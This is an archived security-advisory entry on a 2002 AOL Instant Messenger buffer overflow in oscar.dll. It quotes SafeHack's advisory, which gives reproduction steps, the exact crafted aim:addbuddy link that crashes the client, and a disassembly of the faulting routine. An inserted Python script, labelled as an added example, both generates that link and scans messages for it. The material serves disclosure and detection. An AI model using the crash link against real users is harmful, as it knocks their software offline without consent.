SecurityTracker.com
SecurityTracker Archives

Category:   Application (Instant Messaging/IRC/Chat)  >   AOL Instant Messenger
Vendors:   America Online, Inc.
AOL Instant Messenger (AIM) Short Message Feature Buffer Overflow Lets Remote Users Crash the AIM Client Software
SecurityTracker Alert ID:  1003713
SecurityTracker URL:  http://securitytracker.com/id/1003713
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 1 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): Tested on the 4.8.2646 beta; the reporter states that all versions are affected
Description:   SafeHack (NtWaK0 and Recon) reported a buffer overflow in the AOL Instant Messenger (AIM) client. A remote user can cause another user's AIM client to crash.

According to the report, oscar.dll contains a buffer overflow in its string-copy routine o_strncpy (the function named in the Dr. Watson log below) that is triggered when a user clicks an aim:addbuddy hyperlink carrying an oversized list of screen names and group names. Such a link can be placed in an instant message with the link button of the IM window.

A remote user can therefore send an instant message containing a crafted link to another AIM user; that user's client crashes when the link is clicked. The report notes that the crash occurs on whichever side clicks the link, sender or recipient. Only a crash is claimed; no code execution is demonstrated.

The following demonstration exploit steps are provided:

1- Make sure you have AIM 4.8.2646 installed.
2- Open a new IM window and click the link button to set up a hyperlink for your buddy.
3- Input the exact text into the link: aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678&groupname=12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678,12345678,
4- The text can be anything as long as it meets the format of 8 characters for each word to add as a screenname and a groupname; there should be 11 screenname entries and 10 groupname entries.
5- A memory dump (Dr. Watson) occurs as soon as the hyperlink is clicked by either side (you or your buddy).
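The steps above (and the identical steps in the SafeHack advisory quoted further down) describe the crash trigger only as a hand-typed link. The script below, an added example that is not part of the SecurityTracker entry, the advisory, or any AOL code, builds the link from the advisory's format rules (8-character words, 11 screen names, 10 group names, trailing comma on the group list), parses aim:addbuddy links back into their parameter lists, and scans instant-message text for links that look like this trigger. The limits in assess(), the sample messages, and all function names are assumptions chosen for illustration, not values documented for oscar.dll.

```python
"""Build, parse and flag the crafted aim:addbuddy link from the advisory.

Added example for this SecurityTracker entry; not code from the advisory
or from AOL.  The limits used by assess() are assumptions for illustration.
"""
import re
from dataclasses import dataclass

ENTRY = "12345678"       # the advisory's 8-character filler word
SCREENNAME_COUNT = 11    # "the instances should be 11 for the screenname"
GROUPNAME_COUNT = 10     # "... and 10 for the groupname"


def build_poc_link(entry: str = ENTRY,
                   screennames: int = SCREENNAME_COUNT,
                   groupnames: int = GROUPNAME_COUNT) -> str:
    """Reproduce the link from step 3 of the advisory.

    The screenname list has no trailing comma, the groupname list does,
    exactly as the advisory prints it.
    """
    if len(entry) != 8:
        raise ValueError("the advisory's format uses 8 characters per word")
    sn = ",".join([entry] * screennames)
    gn = ",".join([entry] * groupnames) + ","
    return f"aim:addbuddy?screenname={sn}&groupname={gn}"


@dataclass
class ParamList:
    raw_length: int   # length of the parameter value as written in the link
    entries: list     # non-empty comma-separated items


def parse_addbuddy(link: str) -> dict:
    """Split an aim:addbuddy link into its comma-separated parameter lists.

    Raises ValueError for any other aim: action so callers can skip those.
    A trailing comma (as in the advisory's groupname list) leaves an empty
    item, which is dropped from entries but still counted in raw_length.
    """
    m = re.fullmatch(r"aim:addbuddy\?(.*)", link, flags=re.IGNORECASE)
    if m is None:
        raise ValueError("not an aim:addbuddy link")
    params = {}
    for field in m.group(1).split("&"):
        if not field:
            continue
        name, _, value = field.partition("=")
        params[name.lower()] = ParamList(len(value),
                                         [e for e in value.split(",") if e])
    return params


# Assumed limits, not numbers from the advisory or from AOL documentation.
MAX_ENTRY_LEN = 16   # assumed longest valid AIM screen name
MAX_ENTRIES = 4      # more names per link than a person would add by hand
MAX_VALUE_LEN = 64   # the advisory's lists are 98 and 90 characters long


def assess(link: str) -> list:
    """Return the reasons a link resembles the advisory's crash trigger.

    An empty list means every parameter is within the assumed limits.
    """
    reasons = []
    for name, plist in parse_addbuddy(link).items():
        if len(plist.entries) > MAX_ENTRIES:
            reasons.append(f"{name}: {len(plist.entries)} entries")
        if plist.raw_length > MAX_VALUE_LEN:
            reasons.append(f"{name}: value is {plist.raw_length} characters")
        longest = max((len(e) for e in plist.entries), default=0)
        if longest > MAX_ENTRY_LEN:
            reasons.append(f"{name}: entry of {longest} characters")
    return reasons


LINK_RE = re.compile(r"aim:[^\s\"'<>]+", re.IGNORECASE)


def scan_messages(messages) -> list:
    """Return (index, link, reasons) for every aim:addbuddy link in the
    given message texts that assess() flags; other aim: actions are ignored."""
    flagged = []
    for i, text in enumerate(messages):
        for link in LINK_RE.findall(text):
            try:
                reasons = assess(link)
            except ValueError:
                continue
            if reasons:
                flagged.append((i, link, reasons))
    return flagged


# Constructed sample messages: a normal buddy link, the advisory's link, and
# an unrelated aim: action that the scanner must leave alone.
SAMPLE_MESSAGES = [
    "hey, add me: aim:addbuddy?screenname=bob123&groupname=Friends",
    "check this out -> " + build_poc_link(),
    "aim:goim?screenname=alice&message=hi",
]

if __name__ == "__main__":
    for i, link, reasons in scan_messages(SAMPLE_MESSAGES):
        print(f"message {i}: {link[:40]}...")
        for r in reasons:
            print("   ", r)
```

Run stand-alone, the script reports only the second sample message, citing the 11-entry, 98-character screenname list and the 10-entry, 90-character groupname list; the single-name link and the aim:goim link pass. The parser keeps raw_length separate from the entry count because the advisory's trigger depends on the total amount of text copied, not just how many names are listed.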

Impact:   A remote user can cause another user's AIM client to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.aol.com/
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  AIM Buffer Overflow


http://safehack.com/Advisory/aimbuffer.txt

Attached advisory (aimbuffer.txt):

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                           .--------.
                          / Advisory \
+-----------------------------------------------------------------------.
                                                                        :
Affected         : All versions of AIM including the beta 4.8.2646      :
Type             : Local/Remote Buffer Overflow                         :
Date             : 29-02-2002                                           :
Author           : NtWaK0 & Recon @ www.SafeHack.com                    :
+-----------------------------------------------------------------------.
We think this was not reported. Nothing was found publicly about this.

+------------------.
Crash of AIM Client \
+--------------------`--------------------------------------------------.
                                                                        :
+-----------.                                                           :
 Disclaimer  \                                                          :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on        :
experiments, though it may be false. The opinions expressed in this     :
advisory and program are my own and NOT of any company.                 :
In fact I do not work for anyone at the present time.                   :
                                                                        :
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are     :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone   :
does with this information.                                             :
Remember: Use a computer in ways that ensure respect for your fellows.  :
                                                                        :
+-------------.                                                         :
 Brief History \                                                        :
+---------------`-------------------------------------------------------.
If you are running any version of AIM (AOL Instant Messenger) you are   :
affected by this crash; the vendor has been informed.                   :
                                                                        :
AOL's Instant Messenger client (AIM) contains a buffer overflow         :
vulnerability in the file oscar.dll.                                    :
Instant Messenger allows AOL users to send short messages between       :
its users. A buffer overflow in oscar.dll in the al register.           :
                                                                        :
+---------------------------+                                           :
 >>> Test OS Applications <<<                                           :
+---------------------------+                                           :
Tested on all versions of the Microsoft Windows family of OS with the   :
latest beta version of AIM 4.8.2646                                     :
                                                                        :
+-----------.                                                           :
 The Problem \                                                          :
+-------------`---------------------------------------------------------.
Normally I do not use AIM, but a friend of mine, "Recon", told me about :
a strange problem he found. Since I am curious I installed AIM and did  :
some tests to find out what was going on. Again, thanks Recon.          :
                                                                        :
AOL's Instant Messenger client (AIM) contains a buffer overflow         :
vulnerability in the file oscar.dll.                                    :
Instant Messenger allows AOL users to send short messages between       :
its users. A buffer overflow in oscar.dll in the al register.           :
                                                                        :
The buffer overflow will happen if you send a specially crafted message :
to an AIM user.                                                         :
                                                                        :
                                                                        :
                                                                        :
To see the buffer overflow do the following steps:                      :
1- Make sure you have AIM 4.8.2646 installed                            :
2- Open a new IM window and click the link button to set up a hyperlink :
   for your buddy.                                                      :
3- Input the exact text into the link:                                  :
   aim:addbuddy?screenname=12345678,12345678,12345678,12345678,12345678,:
   12345678,12345678,12345678,12345678,12345678,12345678&groupname=     :
   12345678,12345678,12345678,12345678,12345678,12345678,12345678,      :
   12345678,12345678,12345678,                                          :
                                                                        :
4- The text can be anything as long as it meets the format of 8         :
   characters for each word to add as a screenname and a groupname; the :
   instances should be 11 for the screenname and 10 for the groupname.  :
5- A memory dump occurs as soon as the hyperlink is clicked by either   :
   side (you or your buddy).                                            :
                                                                        :
This was taken from the Dr. Watson log after the buffer overflow:       :
                                                                        :
function: o_strncpy                                                     :
        1218b4f9 8b4508           mov     eax,[ebp+0x8]          ss:00c :
        1218b4fc 3b450c           cmp     eax,[ebp+0xc]          ss:00c :
        1218b4ff 7419             jz      LoadRendezvousString+0x39f6 ( :
        1218b501 8a06             mov     al,[esi]                      :
        1218b503 8807             mov     [edi],al                      :
        1218b505 47               inc     edi                           :
        1218b506 ff4508           inc     dword ptr [ebp+0x8]    ss:00c :
        1218b509 46               inc     esi                           :
        1218b50a 43               inc     ebx                           :
        1218b50b 8a06             mov     al,[esi]                      :
FAULT ->1218b50d 8807             mov     [edi],al                      :
        1218b50f 47               inc     edi                           :
        1218b510 ff4508           inc     dword ptr [ebp+0x8]    ss:00c :
        1218b513 46               inc     esi                           :
        1218b514 43               inc     ebx                           :
        1218b515 803e00           cmp     byte ptr [esi],0x0            :
        1218b518 75cf             jnz     LoadRendezvousString+0x3bc5 ( :
        1218b51a 8b4d0c           mov     ecx,[ebp+0xc]          ss:00c :
        1218b51d 3bf9             cmp     edi,ecx                       :
        1218b51f 7312             jnb OscoreUseCurrentAcceleratorTable+ :
        1218b521 2bcf             sub     ecx,edi                       :
        1218b523 33c0             xor     eax,eax                       :
                                                                        :
Below is a portion of the asm code for the file oscar.dll               :
===============================================                         :
.text:1218B4E9 loc_1218B4E9:           ; CODE XREF: o_strncpy+61j      :
.text:1218B4E9                 cmp     edi, [ebp+lpsz]                  :
.text:1218B4EC                 jnb     short loc_1218B533               :
.text:1218B4EE                 push    esi             ; lpsz           :
.text:1218B4EF                 call    ds:CharNextA
.text:1218B4F5                 cmp     eax, ebx
.text:1218B4F7                 jnz     short loc_1218B50B
.text:1218B4F9                 mov     eax, [ebp+arg_0]
.text:1218B4FC                 cmp     eax, [ebp+lpsz]
.text:1218B4FF                 jz      short loc_1218B51A
.text:1218B501                 mov     al, [esi]
.text:1218B503                 mov     [edi], al
.text:1218B505                 inc     edi
.text:1218B506                 inc     [ebp+arg_0]
.text:1218B509                 inc     esi
.text:1218B50A                 inc     ebx
===============================================
.text:1218B50B loc_1218B50B:           ; CODE XREF: o_strncpy+40j
.text:1218B50B                 mov     al, [esi]       
.text:1218B50D                 mov     [edi], al  ; <<<---HERE IS THE P
.text:1218B50F                 inc     edi
.text:1218B510                 inc     [ebp+arg_0]
.text:1218B513                 inc     esi
.text:1218B514                 inc     ebx
.text:1218B515                 cmp     byte ptr [esi], 0
.text:1218B518                 jnz     short loc_1218B4E9
=================================================
.text:1218B51A loc_1218B51A:                           ; CODE XREF: o_s
.text:1218B51A                                         ; o_strncpy+48j
.text:1218B51A                 mov     ecx, [ebp+lpsz]
.text:1218B51D                 cmp     edi, ecx
.text:1218B51F                 jnb     short loc_1218B533
.text:1218B521                 sub     ecx, edi
.text:1218B523                 xor     eax, eax
.text:1218B525                 mov     edx, ecx
.text:1218B527                 shr     ecx, 2
.text:1218B52A                 repe stosd
.text:1218B52C                 mov     ecx, edx
.text:1218B52E                 and     ecx, 3
.text:1218B531                 repe stosb
.text:1218B533 
==================================================
                                                                        :
                                                                        :
Here is the stack variables                                             :
===========================                                             :
00000000  s              db 4 dup(?)                                    :
00000004  r              db 4 dup(?)                                    :
00000008 arg_0           dd ?                                           :
0000000C lpsz            dd ?                    ; offset (FFFFFFFF)    :
00000010 arg_8           dd ?                                           :
                                                                        : 
This issue has not been tested on third-party software that supports    :
the OSCAR protocol.                                                     :
                                                                        :
+------------.                                                          :
 The Solution \                                                         :
+--------------`--------------------------------------------------------.
We could not locate an AIM email address to send them this issue.       :
+-----------------------------------------------------------------------.





-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPH+L6/PoW9fFNsN8EQLySQCg8iMY/53lUJxMnzI4XJCJqYbgSukAoNke
7ErBTjxRHacFmbkm/BoE6Kfq
=Oe3u
-----END PGP SIGNATURE-----


Copyright 2021, SecurityGlobal.net LLC